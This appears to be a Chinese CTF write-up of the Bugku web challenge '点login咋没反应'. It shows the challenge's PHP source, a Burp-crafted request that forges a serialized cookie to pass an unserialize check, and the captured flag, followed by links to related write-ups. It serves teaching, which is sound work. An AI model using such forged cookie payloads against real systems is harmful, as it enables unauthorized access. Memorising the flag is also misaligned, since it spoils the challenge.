bugku#点login咋没反应-writeup
点login咋没反应
今天简单给友友们分享一下修改数据包上传的一个题型,请食用。
打开靶场
查看源码有admin.css
查看/?hint
发现admin.css 访问
- 发现/* try ?15057 */ 访问
- 分析代码
<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];if(isset($_GET['15057'])){ //isset函数检测输入值是否为空,若为空执行elseifshow_source(__FILE__);
} //isset函数检测输入值是否为空,若为空执行elseifelseif (unserialize($cookie) === "$KEY") //令cookie值反序列化后的值与ctf.bugku.com相同
{
echo "$flag"; //输出key}
else {
?>
- 当传入的参数是空的,cookie的值反序列化后等于key,则显示flag,使用在线序列化的网站快速实现
https://www.toolnb.com/dev/runCode/243e11a40a13ca67d0f13d10dadfdd48.html
- Cookie
- 使用burp修改数据包发包
GET / HTTP/1.1
Host: 114.67.175.224:11451
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
cookie:s:13:"ctf.bugku.com";
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
- 根据返回包成功得到flag!
flag{fd86b33cc7871e86c33b67ff01906bcc}
【文章仅限网络安全爱好者学习参考使用,请勿用于非法途径。】
#网络安全爱好者#doyoubest
bugku#点login咋没反应-writeup相关推荐
- Bugku CTF 杂项(21-29) Writeup
Bugku CTF 杂项(21-29) Writeup 0x21图穷匕见 下载得到一个图片,用winhex打开发现jpg文件尾FF D8后面有大量16进制数据,复制后面的数据,用notepad++中插 ...
- Bugku CTF 杂项(13-20) Writeup
Bugku CTF 杂项(13-20) Writeup 0x13这么多数据包 用wireshark打开,浏览一下从第104个包开始有TCP协议,那么就是从第104个包开始就是攻击机(192.168.1 ...
- BugKu CTF 社工题部分writeup
1.密码 姓名:张三 生日:19970315 就是猜密码吧 zs19970315 2.信息查找 社会工程学基础题目 信息查找 听说bugku.cn 在今日头条上能找到?? 提示:flag为群号码 百度 ...
- bugku的做个游戏(08067CTF) writeup
下载题目给的文件:heiheihei.jar 发现是java的jar文件,直接运行: 在控制台执行命令:java -jar heiheihei.jar 注:需要java运行环境,如果没有,先搭建jav ...
- bugku成绩单(sql注入)writeup
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩 SQL注入应该没跑了 输入1'返回异常,输入1'--+返回异常,输入1' #或者1'-- +返回正常,看来过滤了--+ 观察,表貌似有 ...
- CTF练习题[WEB]-点login咋没反应
https://ctf.bugku.com/challenges/detail/id/109.html?page=1 拿到题目如下 点击登录没有反应 扫目录发现admin.css 尝试提交参数 需要在 ...
- bugku web篇
web2 f12查看源代码在注释语句里面 计算器 直接求给的题目 但是对input的最大输入个数做了限制可以直接f12改限制字数也可以bp抓包修改 web基础$_GET $what=$_GET['wh ...
- web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
web做题笔记 文章目录 web做题笔记 buuoj easy_tornado 随便注 warmup easysql 高明的黑客 jarvisoj re? flag在管理员手上 api调用 chopp ...
- 错误提示没了_ESC错误排查-系统启动篇
# ECS从入门到精通(错误排查) # Linux启动与登录问题 Linux 启动与登录问题是 ECS 的高频问题,而往往处理不及时会直接影响到 用户业务的正常可持续运行,因此也变成了我们处理问题优先 ...
最新文章
- OPENCV图像数据类型
- android studio gradle版本太低问题解决方案
- python画笑脸图案-如何让这些代码中的一个在窗口中绘制不同大小的笑脸?
- 【操作系统复习】操作系统的概念、功能和目标
- HGE引擎适用于MFC的修改
- android 部分区域点击,Android编程实现ListView中item部分区域添加点击事件功能
- 阿里高级技术专家至简: Service Mesh 在超大规模场景下的落地挑战
- OJ1180: 成绩统计(结构体专题)(C语言)
- 【AI视野·今日Robot 机器人论文速览 第十八期】Fri, 2 Jul 2021
- mysql授权远程访问
- mac下编译hadoop-3.0.3
- C++课设——药品管理系统
- java对话框进度条_java进度条
- ssh secure shell:server responded algorithm negotiation failed
- php查找sql,sql如何去重查询
- _crol_和左移的区别
- matlab演奏《起风了》代码
- 莫队算法+带修莫队+回滚莫队
- iphone计算机设置,苹果手机怎么设置其他铃声
- 瑞思拜 我儿豁 SpringMVC基础 兄弟们冲冲冲